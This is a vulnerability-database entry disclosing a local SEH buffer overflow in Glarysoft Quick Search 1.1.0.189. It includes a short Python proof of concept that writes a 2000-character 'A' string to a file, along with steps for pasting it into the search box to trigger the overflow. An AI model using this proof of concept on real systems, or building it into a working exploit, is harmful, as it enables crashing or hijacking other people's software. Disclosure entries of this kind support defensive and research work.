Quick Search 1.1.0.189 Buffer Overflow

2013.05.16
Credit: ariarat
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

# Exploit Title: Quick Search Version 1.1.0.189 Buffer Overflow vulnerability(SEH) # Date: 14-05-2013 # Exploit Author: ariarat # Vendor Homepage: http://www.glarysoft.com/ # Software Link: http://download.glarysoft.com/qsearchsetup.exe # Version: 1.1.0.189 # Tested on: [ Windows 7 & windows XP sp2,sp3] #============================================================================================ # After creating txt file,open created file and copy the AAA... string to clipboard and # then paste in Search section.for better results bring program in Full Mode and in Edit # menu choose Match Path and then paste your string. # #============================================================================================ # Contact : #------------------ # Web Page : http://ariarat.blogspot.com # Email : mehdi.esmaeelpour@gmail.com #============================================================================================ #!/usr/bin/python filename="string.txt" buffer = "\x41" * 2000 textfile = open(filename , 'w') textfile.write(buffer) textfile.close()

References:

http://download.glarysoft.com/qsearchsetup.exe


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top